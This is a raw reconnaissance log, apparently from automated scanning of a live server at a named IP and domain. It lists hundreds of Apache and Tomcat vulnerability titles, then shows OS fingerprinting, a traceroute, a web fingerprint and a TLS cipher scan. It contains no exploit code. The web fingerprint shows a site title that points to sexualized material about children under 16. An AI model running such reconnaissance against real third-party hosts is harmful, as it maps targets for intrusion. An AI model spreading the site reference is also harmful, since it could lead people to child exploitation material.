8218| [47462] Apache Tomcat HttpServletResponse.sendError Method Message Argument XSS
8219| [47096] Oracle Weblogic Apache Connector POST Request Overflow
8220| [46382] Frontend Filemanager (air_filemanager) Extension for TYPO3 on Apache Unspecified Arbitrary Code Execution
8221| [46285] TYPO3 on Apache Crafted Filename Upload Arbitrary Command Execution
8222| [46085] Apache HTTP Server mod_proxy ap_proxy_http_process_response() Function Interim Response Forwarding Remote DoS
8223| [45905] Apache Tomcat Host Manager host-manager/html/add name Parameter XSS
8224| [45879] Ragnarok Online Control Panel on Apache Crafted Traversal Authentication Bypass
8225| [45742] Apache HTTP Server on Novell Unspecified Request Directive Internal IP Disclosure
8226| [45740] Apache Derby DropSchemaNode Bind Phase Arbitrary Scheme Statement Dropping
8227| [45599] Apache Derby Lock Table Statement Privilege Requirement Bypass Arbitrary Table Lock
8228| [45585] Apache Derby ACCSEC Command RDBNAM Parameter Cleartext Credential Disclosure
8229| [45584] Apache Derby DatabaseMetaData.getURL Function Cleartext Credential Disclosure
8230| [45420] Apache HTTP Server 403 Error Page UTF-7 Encoded XSS
8231| [44728] PHP Toolkit on Gentoo Linux Interpretation Conflict Apache HTTP Server Local DoS
8232| [44618] Oracle JSP Apache/Jserv Path Translation Traversal Arbitrary JSP File Execution
8233| [44159] Apache HTTP Server Remote Virtual Host Name Disclosure
8234| [43997] Apache-SSL ExpandCert() Function Certificate Handling Arbitrary Environment Variables Manipulation
8235| [43994] suPHP for Apache (mod_suphp) Directory Symlink Local Privilege Escalation
8236| [43993] suPHP for Apache (mod_suphp) Owner Mode Race Condition Symlink Local Privilege Escalation
8237| [43663] Apache HTTP Server Mixed Platform AddType Directive Crafted Request PHP Source Disclosure
8238| [43658] AuthCAS Module (AuthCAS.pm) for Apache HTTP Server SESSION_COOKIE_NAME SQL Injection
8239| [43452] Apache Tomcat HTTP Request Smuggling
8240| [43309] Apache Geronimo LoginModule Login Method Bypass
8241| [43290] Apache JSPWiki Entry Page Attachment Unrestricted File Upload
8242| [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption
8243| [43224] Apache Geronimo on SuSE Linux init Script Symlink Unspecified File/Directory Access
8244| [43189] Apache mod_jk2 Host Header Multiple Fields Remote Overflow
8245| [42937] Apache HTTP Server mod_proxy_balancer balancer-manager Unspecified CSRF
8246| [42341] MOD_PLSQL for Apache Unspecified URL SQL Injection
8247| [42340] MOD_PLSQL for Apache CGI Environment Handling Unspecified Overflow
8248| [42214] Apache HTTP Server mod_proxy_ftp UTF-7 Encoded XSS
8249| [42091] Apache Maven Site Plugin Installation Permission Weakness
8250| [42089] Apache Maven .m2/settings.xml Cleartext Password Disclosure
8251| [42088] Apache Maven Defined Repo Process Listing Password Disclosure
8252| [42087] Apache Maven Site Plugin SSH Deployment Permission Setting Weakness
8253| [42036] Apache HTTP Server MS-DOS Device Request Host OS Disclosure
8254| [41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS
8255| [41436] Apache Tomcat Native APR Connector Duplicate Request Issue
8256| [41435] Apache Tomcat %5C Cookie Handling Session ID Disclosure
8257| [41434] Apache Tomcat Exception Handling Subsequent Request Information Disclosure
8258| [41400] LimeSurvey save.php Apache Log File PHP Code Injection
8259| [41029] Apache Tomcat Calendar Examples Application cal2.jsp Multiple Parameter CSRF
8260| [41019] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload XSS
8261| [41018] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload CRLF
8262| [40853] Apache Tomcat SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) JSESSIONIDSSO Cookie Security Weakness
8263| [40264] Apache HTTP Server mod_proxy_balancer balancer_handler Function bb Variable Remote DoS
8264| [40263] Apache HTTP Server mod_proxy_balancer balancer-manager Multiple Parameter XSS
8265| [40262] Apache HTTP Server mod_status refresh XSS
8266| [39833] Apache Tomcat JULI Logging Component catalina.policy Security Bypass
8267| [39251] Coppermine Photo Gallery on Apache Multiple File Extension Upload Arbitrary Code Execution
8268| [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure
8269| [39134] Apache mod_imagemap Module Imagemap Unspecified XSS
8270| [39133] Apache mod_imap Module Imagemap File Unspecified XSS
8271| [39035] Apache Tomcat examples/servlet/CookieExample Multiple Parameter XSS
8272| [39003] Apache HTTP Server HTTP Method Header Request Entity Too Large XSS
8273| [39000] Apache Tomcat SendMailServlet sendmail.jsp mailfrom Parameter XSS
8274| [38939] Apache HTTP Server Prefork MPM Module Array Modification Local DoS
8275| [38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access
8276| [38662] Apache Geronimo SQLLoginModule Nonexistent User Authentication Bypass
8277| [38661] Apache Geronimo MEJB Unspecified Authentication Bypass
8278| [38641] Apache HTTP Server mod_mem_cache recall_headers Function Information Disclosure
8279| [38640] Apache HTTP Server suexec Document Root Unauthorized Operations
8280| [38639] Apache HTTP Server suexec Multiple Symlink Privilege Escalation
8281| [38636] Apache HTTP Server mod_autoindex.c P Variable UTF-7 Charset XSS
8282| [38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS
8283| [38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access
8284| [37079] Apache HTTP Server mod_cache cache_util.c Malformed Cache-Control Header DoS
8285| [37071] Apache Tomcat Cookie Handling Session ID Disclosure
8286| [37070] Apache Tomcat Cookie Handling Quote Delimiter Session ID Disclosure
8287| [37052] Apache HTTP Server mod_status mod_status.c Unspecified XSS
8288| [37051] Apache HTTP Server mod_proxy modules/proxy/proxy_util.c Crafted Header Remote DoS
8289| [37050] Apache HTTP Server Prefork MPM Module Crafted Code Sequence Local DoS
8290| [36417] Apache Tomcat Host Manager Servlet html/add Action aliases Parameter XSS
8291| [36377] Apache MyFaces Tomahawk JSF Application autoscroll Multiple Script XSS
8292| [36080] Apache Tomcat JSP Examples Crafted URI XSS
8293| [36079] Apache Tomcat Manager Uploaded Filename XSS
8294| [34888] Apache Tomcat Example Calendar Application cal2.jsp time Parameter XSS
8295| [34887] Apache Tomcat implicit-objects.jsp Crafted Header XSS
8296| [34885] Apache Tomcat on IIS Servlet Engine MS-DOS Device Request DoS
8297| [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure
8298| [34883] Apache Tomcat Crafted JSP File Request Path Disclosure
8299| [34882] Apache Tomcat Default SSL Ciphersuite Configuration Weakness
8300| [34881] Apache Tomcat Malformed Accept-Language Header XSS
8301| [34880] Apache Tomcat HTTP/1.1 Connector NULL Byte Request JSP Source Disclosure
8302| [34879] Apache Tomcat examples/jsp2/jspx/textRotate.jspx XSS
8303| [34878] Apache Tomcat examples/jsp2/el/implicit-objects.jsp XSS
8304| [34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access
8305| [34876] Apache HTTP Server ScriptAlias CGI Source Disclosure
8306| [34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS
8307| [34874] Apache Tomcat AJP Connector mod_jk ajp_process_callback Remote Memory Disclosure
8308| [34873] Apache Stats Variable Extraction _REQUEST Ssuperglobal Array Overwrite
8309| [34872] Apache HTTP Server suexec User/Group Combination Weakness Local Privilege Escalation
8310| [34769] Apache Tomcat w/ Proxy Module Double Encoded Traversal Arbitrary File Access
8311| [34541] mod_perl for Apache HTTP Server RegistryCooker.pm PATH_INFO Crafted URI Remote DoS
8312| [34540] mod_perl for Apache HTTP Server PerlRun.pm PATH_INFO Crafted URI Remote DoS
8313| [34398] Apache Tomcat mod_jk Invalid Chunked Encoded Body Information Disclosure
8314| [34154] Apache Axis Nonexistent Java Web Service Path Disclosure
8315| [33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow
8316| [33816] Apache HTTP Server on Debian Linux TTY Local Privilege Escalation
8317| [33456] Apache HTTP Server Crafted TCP Connection Range Header DoS
8318| [33346] Avaya Multiple Products Apache Tomcat Port Weakness
8319| [32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation
8320| [32978] Apache Java Mail Enterprise Server (JAMES) POP3Server Log File Plaintext Password Disclosure
8321| [32724] Apache mod_python _filter_read Freed Memory Disclosure
8322| [32723] Apache Tomcat semicolon Crafted Filename Request Forced Directory Listing
8323| [32396] Apache Open For Business Project (OFBiz) Ecommerce Component Forum Implementation Message Body XSS
8324| [32395] Apache Open For Business Project (OFBiz) Ecommerce Component Form Field Manipulation Privilege Escalation
8325| [30354] Linux Subversion libapache2-svn Search Path Subversion Local Privilege Escalation
8326| [29603] PHP ini_restore() Apache httpd.conf Options Bypass
8327| [29536] Apache Tcl mod_tcl set_var Function Remote Format String
8328| [28919] Apache Roller Weblogger Blog Comment Multiple Field XSS
8329| [28130] PHP with Apache Mixed Case Method Limit Directive Bypass
8330| [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure
8331| [27588] Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow
8332| [27487] Apache HTTP Server Crafted Expect Header Cross Domain HTML Injection
8333| [26935] FCKeditor on Apache connector.php Crafted File Extension Arbitrary File Upload
8334| [26572] Apache Java Mail Enterprise Server (JAMES) MAIL Command Overflow DoS
8335| [25909] Drupal on Apache files Directory File Upload Arbitrary Code Execution
8336| [24825] Oracle ModPL/SQL for Apache Unspecified Remote HTTP Issue
8337| [24365] Apache Struts Multiple Function Error Message XSS
8338| [24364] Apache Struts getMultipartRequestHandler() Function Crafted Request DoS
8339| [24363] Apache Struts org.apache.struts.taglib.html.Constants.CANCEL Validation Bypass
8340| [24103] Pubcookie Apache mod_pubcookie Unspecified XSS
8341| [23906] Apache mod_python for Apache HTTP Server FileSession Privileged Local Command Execution
8342| [23905] Apache Log4net LocalSyslogAppender Format String Memory Corruption DoS
8343| [23198] Apache WSS4J Library SOAP Signature Verification Bypass
8344| [23124] Generic Apache Request Library (libapreq) apreq_parse_* Functions Remote DoS
8345| [22652] mod_php for Apache HTTP Server Crafted import_request_variables Function DoS
8346| [22475] PHP w/ Apache PDO::FETCH_CLASS __set() Function DoS
8347| [22473] PHP w/ Apache2 Crafted PDOStatement DoS
8348| [22459] Apache Geronimo Error Page XSS
8349| [22458] Apache Tomcat / Geronimo Sample Script cal2.jsp time Parameter XSS
8350| [22301] auth_ldap for Apache HTTP Server auth_ldap_log_reason() Function Remote Format String
8351| [22261] Apache HTTP Server mod_ssl ssl_hook_Access Error Handling DoS
8352| [22259] mod_auth_pgsql for Apache HTTP Server Log Function Format String
8353| [21736] Apache Java Mail Enterprise Server (JAMES) Spooler retrieve Function DoS
8354| [21705] Apache HTTP Server mod_imap Image Map Referer XSS
8355| [21021] Apache Struts Error Message XSS
8356| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
8357| [20491] PHP mod_php apache2handler SAPI Crafted .htaccess DoS
8358| [20462] Apache HTTP Server worker.c MPM Memory Exhaustion DoS
8359| [20439] Apache Tomcat Directory Listing Saturation DoS
8360| [20373] Apache Tomcat on HP Secure OS for Linux Unspecified Servlet Access Issue
8361| [20285] Apache HTTP Server Log File Control Character Injection
8362| [20242] Apache HTTP Server mod_usertrack Predictable Session ID Generation
8363| [20209] Brainf*ck Module (mod_bf) for Apache HTTP Server Local Overflow
8364| [20033] Apache Tomcat MS-DOS Device Request Error Message Path Disclosure
8365| [19883] apachetop atop.debug Symlink Arbitrary File Overwrite
8366| [19863] mod_auth_shadow for Apache HTTP Server require group Authentication Bypass
8367| [19855] Apache HTTP Server ErrorDocument Directive .htaccess Bypass
8368| [19821] Apache Tomcat Malformed Post Request Information Disclosure
8369| [19769] Apache HTTP Server Double-reverse DNS Lookup Spoofing
8370| [19188] Apache HTTP Server mod_ssl SSLVerifyClient Per-location Context Restriction Bypass
8371| [19137] Apache HTTP Server on Red Hat Linux Double Slash GET Request Forced Directory Listing
8372| [19136] Apache on Mandrake Linux Arbitrary Directory Forced Listing
8373| [18977] Apache HTTP Server Crafted HTTP Range Header DoS
8374| [18389] Ragnarok Online Control Panel Apache Authentication Bypass
8375| [18286] Apache HTTP Server mod_ssl ssl_callback_SSLVerify_CRL( ) Function Overflow
8376| [18233] Apache HTTP Server htdigest user Variable Overfow
8377| [17738] Apache HTTP Server HTTP Request Smuggling
8378| [16586] Apache HTTP Server Win32 GET Overflow DoS
8379| [15889] Apache HTTP Server mod_cgid Threaded MPM CGI Output Misdirection
8380| [14896] mod_dav for Apache HTTP Server Remote Null Dereference Child Process Termination
8381| [14879] Apache HTTP Server ap_log_rerror Function Error Message Path Disclosure
8382| [14770] Apache Tomcat AJP12 Protocol Malformed Packet Remote DoS
8383| [14597] Apache Tomcat IntegerOverflow.jsp Test JSP Script Path Disclosure
8384| [14596] Apache Tomcat pageSession.jsp Test JSP Script Path Disclosure
8385| [14595] Apache Tomcat pageLanguage.jsp Test JSP Script Path Disclosure
8386| [14594] Apache Tomcat pageIsThreadSafe.jsp Test JSP Script Path Disclosure
8387| [14593] Apache Tomcat pageIsErrorPage.jsp Test JSP Script Path Disclosure
8388| [14592] Apache Tomcat pageInvalid.jsp Test JSP Script Path Disclosure
8389| [14591] Apache Tomcat pageExtends.jsp Test JSP Script Path Disclosure
8390| [14590] Apache Tomcat pageDouble.jsp Test JSP Script Path Disclosure
8391| [14589] Apache Tomcat pageAutoFlush.jsp Test JSP Script Path Disclosure
8392| [14588] Apache Tomcat extends2.jsp Test JSP Script Path Disclosure
8393| [14587] Apache Tomcat extends1.jsp Test JSP Script Path Disclosure
8394| [14586] Apache Tomcat comments.jsp Test JSP Script Path Disclosure
8395| [14585] Apache Tomcat buffer4.jsp Test JSP Script Path Disclosure
8396| [14584] Apache Tomcat buffer3.jsp Test JSP Script Path Disclosure
8397| [14583] Apache Tomcat buffer2.jsp Test JSP Script Path Disclosure
8398| [14582] Apache Tomcat buffer1.jsp Test JSP Script Path Disclosure
8399| [14581] Apache Tomcat pageImport2.jsp Test JSP Script Path Disclosure
8400| [14580] Apache Tomcat pageInfo.jsp Test JSP Script Path Disclosure
8401| [14410] mod_frontpage for Apache HTTP Server fpexec Remote Overflow
8402| [14044] Apache Batik Squiggle Browser with Rhino Scripting Engine Unspecified File System Access
8403| [13737] mod_access_referer for Apache HTTP Server Malformed Referer DoS
8404| [13711] Apache mod_python publisher.py Traversal Arbitrary Object Information Disclosure
8405| [13640] mod_auth_any for Apache HTTP Server on Red Hat Linux Metacharacter Command Execution
8406| [13304] Apache Tomcat realPath.jsp Path Disclosure
8407| [13303] Apache Tomcat source.jsp Arbitrary Directory Listing
8408| [13087] Apache HTTP Server mod_log_forensic check_forensic Symlink Arbitrary File Creation / Overwrite
8409| [12849] mod_auth_radius for Apache HTTP Server radcpy() Function Overflow DoS
8410| [12848] Apache HTTP Server htdigest realm Variable Overflow
8411| [12721] Apache Tomcat examples/jsp2/el/functions.jsp XSS
8412| [12720] mod_dosevasive for Apache HTTP Server Symlink Arbitrary File Create/Overwrite
8413| [12558] Apache HTTP Server IPv6 FTP Proxy Socket Failure DoS
8414| [12557] Apache HTTP Server prefork MPM accept Error DoS
8415| [12233] Apache Tomcat MS-DOS Device Name Request DoS
8416| [12232] Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
8417| [12231] Apache Tomcat web.xml Arbitrary File Access
8418| [12193] Apache HTTP Server on Mac OS X File Handler Bypass
8419| [12192] Apache HTTP Server on Mac OS X Unauthorized .ht and .DS_Store File Access
8420| [12178] Apache Jakarta Lucene results.jsp XSS
8421| [12176] mod_digest_apple for Apache HTTP Server on Mac OS X Authentication Replay
8422| [11391] Apache HTTP Server Header Parsing Space Saturation DoS
8423| [11003] Apache HTTP Server mod_include get_tag() Function Local Overflow
8424| [10976] mod_mylo for Apache HTTP Server mylo_log Logging Function HTTP GET Overflow
8425| [10637] Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
8426| [10546] Macromedia JRun4 mod_jrun Apache Module Remote Overflow
8427| [10471] Apache Xerces-C++ XML Parser DoS
8428| [10218] Apache HTTP Server Satisfy Directive Access Control Bypass
8429| [10068] Apache HTTP Server htpasswd Local Overflow
8430| [10049] mod_cplusplus For Apache HTTP Server Unspecified Overflow
8431| [9994] Apache HTTP Server apr-util IPV6 Parsing DoS
8432| [9991] Apache HTTP Server ap_resolve_env Environment Variable Local Overflow
8433| [9948] mod_dav for Apache HTTP Server LOCK Request DoS
8434| [9742] Apache HTTP Server mod_ssl char_buffer_read Function Reverse Proxy DoS
8435| [9718] Apache HTTP Server Win32 Single Dot Append Arbitrary File Access
8436| [9717] Apache HTTP Server mod_cookies Cookie Overflow
8437| [9716] Apache::Gallery Gallery.pm Inline::C Predictable Filename Code Execution
8438| [9715] Apache HTTP Server rotatelogs Control Characters Over Pipe DoS
8439| [9714] Apache Authentication Module Threaded MPM DoS
8440| [9713] Apache HTTP Server on OS2 filestat.c Device Name Request DoS
8441| [9712] Apache HTTP Server Multiple Linefeed Request Memory Consumption DoS
8442| [9711] Apache HTTP Server Access Log Terminal Escape Sequence Injection
8443| [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass
8444| [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution
8445| [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS
8446| [9707] Apache HTTP Server Duplicate MIME Header Saturation DoS
8447| [9706] Apache Web Server Multiple MIME Header Saturation Remote DoS
8448| [9705] Apache Tomcat Invoker/Default Servlet Source Disclosure
8449| [9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure
8450| [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing
8451| [9700] Apache HTTP Server mod_autoindex Multiple Slash Request Forced Directory Listing
8452| [9699] Apache HTTP Server mod_dir Multiple Slash Request Forced Directory Listing
8453| [9698] Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
8454| [9697] Apache HTTP Server htdigest Local Symlink Arbitrary File Overwrite
8455| [9696] Apache HTTP Server htpasswd Local Symlink Arbitrary File Overwrite
8456| [9695] Apache Tomcat SnoopServlet Servlet Information Disclosure
8457| [9694] PHP3 on Apache HTTP Server Encoded Traversal Arbitrary File Access
8458| [9693] mod_auth_pgsql_sys for Apache HTTP Server User Name SQL Injection
8459| [9692] Apache HTTP Server mod_vhost_alias Mass Virtual Hosting Arbitrary File Access
8460| [9691] Apache HTTP Server mod_rewrite Mass Virtual Hosting Arbitrary File Access
8461| [9690] Apache HTTP Server mod_vhost_alias CGI Program Source Disclosure
8462| [9689] Trustix httpsd for Apache-SSL Permission Weakness Privilege Escalation
8463| [9688] Apache HTTP Server mod_proxy Malformed FTP Command DoS
8464| [9687] Apache::AuthenSmb smbval SMB Authentication Library Multiple Overflows
8465| [9686] Apache::AuthenSmb smbvalid SMB Authentication Library Multiple Overflows
8466| [9523] Apache HTTP Server mod_ssl Aborted Connection DoS
8467| [9459] Oracle PL/SQL (mod_plsql) Apache Module Help Page Request Remote Overflow
8468| [9208] Apache Tomcat .jsp Encoded Newline XSS
8469| [9204] Apache Tomcat ROOT Application XSS
8470| [9203] Apache Tomcat examples Application XSS
8471| [9068] Apache HTTP Server mod_userdir User Account Information Disclosure
8472| [8773] Apache Tomcat Catalina org.apache.catalina.servlets.DefaultServlet Source Code Disclosure
8473| [8772] Apache Tomcat Catalina org.apache.catalina.connector.http DoS
8474| [7943] Apache HTTP Server mod_ssl sslkeys File Disclosure
8475| [7942] Apache HTTP Server mod_ssl Default Pass Phrase
8476| [7941] Apache HTTP Server mod_ssl Encrypted Private Key File Descriptor Leak
8477| [7935] Apache HTTP Server mod_ssl ssl_gcache Race Conditions
8478| [7934] Apache HTTP Server mod_ssl SSLSessionCache File Content Disclosure
8479| [7933] Apache HTTP Server mod_ssl SSLMutex File Content Disclosure
8480| [7932] Apache HTTP Server mod_ssl mkcert.sh File Creation Permission Weakness
8481| [7931] Apache HTTP Server mod_ssl X.509 Client Certificate Authentication Bypass
8482| [7930] Apache HTTP Server mod_ssl ssl_expr_eval_func_file() Overflow
8483| [7929] Apache HTTP Server mod_ssl ssl_engine_log.c mod_proxy Hook Function Remote Format String
8484| [7611] Apache HTTP Server mod_alias Local Overflow
8485| [7394] Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
8486| [7203] Apache Tomcat source.jsp Traversal Arbitrary File Access
8487| [7039] Apache HTTP Server on Mac OS X HFS+ File System Access Bypass
8488| [6882] Apache mod_python Malformed Query String Variant DoS
8489| [6839] Apache HTTP Server mod_proxy Content-Length Overflow
8490| [6630] Apache Tomcat Java Server Pages (JSP) Engine WPrinterJob() DoS
8491| [6472] Apache HTTP Server mod_ssl ssl_util_uuencode_binary Remote Overflow
8492| [5821] Apache HTTP Server Multiple / GET Remote Overflow DoS
8493| [5580] Apache Tomcat Servlet Malformed URL JSP Source Disclosure
8494| [5552] Apache HTTP Server split-logfile Arbitrary .log File Overwrite
8495| [5526] Apache Tomcat Long .JSP URI Path Disclosure
8496| [5278] Apache Tomcat web.xml Restriction Bypass
8497| [5051] Apache Tomcat Null Character DoS
8498| [4973] Apache Tomcat servlet Mapping XSS
8499| [4650] mod_gzip for Apache HTTP Server Debug Mode Printf Stack Overflow
8500| [4649] mod_gzip for Apache HTTP Server Debug Mode Format String Overflow
8501| [4648] mod_gzip for Apache HTTP Server Debug Mode Race Condition
8502| [4568] mod_survey For Apache ENV Tags SQL Injection
8503| [4553] Apache HTTP Server ApacheBench Overflow DoS
8504| [4552] Apache HTTP Server Shared Memory Scoreboard DoS
8505| [4446] Apache HTTP Server mod_disk_cache Stores Credentials
8506| [4383] Apache HTTP Server Socket Race Condition DoS
8507| [4382] Apache HTTP Server Log Entry Terminal Escape Sequence Injection
8508| [4340] Apache Portable Runtime (APR) apr_psprintf DoS
8509| [4232] Apache Cocoon DatabaseAuthenticatorAction SQL Injection
8510| [4231] Apache Cocoon Error Page Server Path Disclosure
8511| [4182] Apache HTTP Server mod_ssl Plain HTTP Request DoS
8512| [4181] Apache HTTP Server mod_access IP Address Netmask Rule Bypass
8513| [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure
8514| [4037] Apache HTTP Server on Cygwin Encoded GET Request Arbitrary File Access
8515| [3877] Apache-SSL SSLVerifyClient SSLFakeBasicAuth Client Certificate Forgery
8516| [3819] Apache HTTP Server mod_digest Cross Realm Credential Replay
8517| [3322] mod_php for Apache HTTP Server Process Hijack
8518| [3215] mod_php for Apache HTTP Server File Descriptor Leakage
8519| [2885] Apache mod_python Malformed Query String DoS
8520| [2749] Apache Cocoon view-source Sample File Traversal Arbitrary File Access
8521| [2733] Apache HTTP Server mod_rewrite Local Overflow
8522| [2672] Apache HTTP Server mod_ssl SSLCipherSuite Ciphersuite Downgrade Weakness
8523| [2613] Apache HTTP Server mod_cgi stderr Output Handling Local DoS
8524| [2149] Apache::Gallery Privilege Escalation
8525| [2107] Apache HTTP Server mod_ssl Host: Header XSS
8526| [1926] Apache HTTP Server mod_rewrite Crafted URI Rule Bypass
8527| [1833] Apache HTTP Server Multiple Slash GET Request DoS
8528| [1577] Apache HTTP Server mod_rewrite RewriteRule Expansion Arbitrary File Access
8529| [872] Apache Tomcat Multiple Default Accounts
8530| [862] Apache HTTP Server SSI Error Page XSS
8531| [859] Apache HTTP Server Win32 Crafted Traversal Arbitrary File Access
8532| [849] Apache Tomcat TroubleShooter Servlet Information Disclosure
8533| [845] Apache Tomcat MSDOS Device XSS
8534| [844] Apache Tomcat Java Servlet Error Page XSS
8535| [842] Apache HTTP Server mod_ssl ssl_compat_directive Function Overflow
8536| [838] Apache HTTP Server Chunked Encoding Remote Overflow
8537| [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure
8538| [775] Apache mod_python Module Importing Privilege Function Execution
8539| [769] Apache HTTP Server Win32 DOS Batch File Arbitrary Command Execution
8540| [756] Apache HTTP Server mod_ssl i2d_SSL_SESSION Function SSL Client Certificate Overflow
8541| [701] Apache HTTP Server Win32 ScriptAlias php.exe Arbitrary File Access
8542| [674] Apache Tomcat Nonexistent File Error Message Path Disclosure
8543| [637] Apache HTTP Server UserDir Directive Username Enumeration
8544| [623] mod_auth_pgsql for Apache HTTP Server User Name SQL Injection
8545| [582] Apache HTTP Server Multiviews Feature Arbitrary Directory Listing
8546| [562] Apache HTTP Server mod_info /server-info Information Disclosure
8547| [561] Apache Web Servers mod_status /server-status Information Disclosure
8548| [417] Apache HTTP Server on SuSE Linux /doc/packages Remote Information Disclosure
8549| [410] mod_perl for Apache HTTP Server /perl/ Directory Listing
8550| [404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
8551| [402] Apache HTTP Server on SuSE Linux cgi-bin-sdb Request Script Source Disclosure
8552| [379] Apache ASP module Apache::ASP source.asp Example File Arbitrary File Creation
8553| [377] Apache Tomcat Snoop Servlet Remote Information Disclosure
8554| [376] Apache Tomcat contextAdmin Arbitrary File Access
8555| [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing
8556| [222] Apache HTTP Server test-cgi Arbitrary File Access
8557| [143] Apache HTTP Server printenv.pl Multiple Method CGI XSS
8558| [48] Apache HTTP Server on Debian /usr/doc Directory Information Disclosure
8559|_
8560Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
8561Device type: general purpose|broadband router|WAP|webcam
8562Running (JUST GUESSING): Linux 2.6.X|3.X|2.4.X (95%), Asus embedded (94%), AXIS embedded (94%)
8563OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/h:asus:rt-ac66u cpe:/h:asus:rt-n10 cpe:/h:axis:211_network_camera cpe:/o:linux:linux_kernel:2.6.20 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3.8
8564Aggressive OS guesses: Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.9 (95%), Asus RT-AC66U router (Linux 2.6) (94%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (94%), Linux 2.6.18 (94%), Asus RT-N16 WAP (Linux 2.6) (94%), Asus RT-N66U WAP (Linux 2.6) (94%), Tomato 1.28 (Linux 2.6.22) (94%), AXIS 211A Network Camera (Linux 2.6.20) (94%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (94%)
8565No exact OS matches for host (test conditions non-ideal).
8566Uptime guess: 30.016 days (since Fri Sep 6 00:04:24 2019)
8567Network Distance: 14 hops
8568TCP Sequence Prediction: Difficulty=257 (Good luck!)
8569IP ID Sequence Generation: All zeros
8570
8571TRACEROUTE (using port 443/tcp)
8572HOP RTT ADDRESS
85731 25.52 ms 10.246.204.1
85742 105.61 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
85753 30.34 ms irb-0.agg1.qc1.ca.m247.com (37.120.128.168)
85764 30.35 ms te-1-5-2-0.bb1.fra2.de.m247.com (82.102.29.44)
85775 84.82 ms te0-7-0-2.rcr21.ymq02.atlas.cogentco.com (38.122.42.161)
85786 84.83 ms be2089.ccr21.ymq01.atlas.cogentco.com (154.54.45.113)
85797 121.31 ms be3043.ccr22.lpl01.atlas.cogentco.com (154.54.44.165)
85808 121.33 ms be2182.ccr41.ams03.atlas.cogentco.com (154.54.77.245)
85819 121.35 ms be3433.rcr21.ams06.atlas.cogentco.com (154.54.58.202)
858210 138.71 ms worldstream.demarc.cogentco.com (149.11.39.90)
858311 138.71 ms 109.236.95.181
858412 138.70 ms 190.2.158.153
858513 138.74 ms 185.106.120.66
858614 102.93 ms latina.petite.guru (185.82.200.52)
8587
8588NSE: Script Post-scanning.
8589Initiating NSE at 00:27
8590Completed NSE at 00:27, 0.00s elapsed
8591Initiating NSE at 00:27
8592Completed NSE at 00:27, 0.00s elapsed
8593#######################################################################################################################################
8594https://www.ygmt.info [200 OK] Apache[2.4.10], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[185.82.200.52], Script[JavaScript], Title[Books, videos, photos, fiction and non-fiction of and about young girls under 16 preteen models], X-UA-Compatible[IE=edge]
8595######################################################################################################################################
8596Version: 1.11.13-static
8597OpenSSL 1.0.2-chacha (1.0.2g-dev)
8598
8599Connected to 185.82.200.52
8600
8601Testing SSL server www.ygmt.info on port 443 using SNI name www.ygmt.info
8602
8603 TLS Fallback SCSV:
8604Server supports TLS Fallback SCSV
8605
8606 TLS renegotiation:
8607Secure session renegotiation supported
8608
8609 TLS Compression:
8610Compression disabled
8611
8612 Heartbleed:
8613TLS 1.2 not vulnerable to heartbleed
8614TLS 1.1 not vulnerable to heartbleed
8615TLS 1.0 not vulnerable to heartbleed
8616
8617 Supported Server Cipher(s):
8618Preferred TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
8619Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
8620Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
8621Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
8622Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
8623Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
8624Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
8625Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
8626Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
8627Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
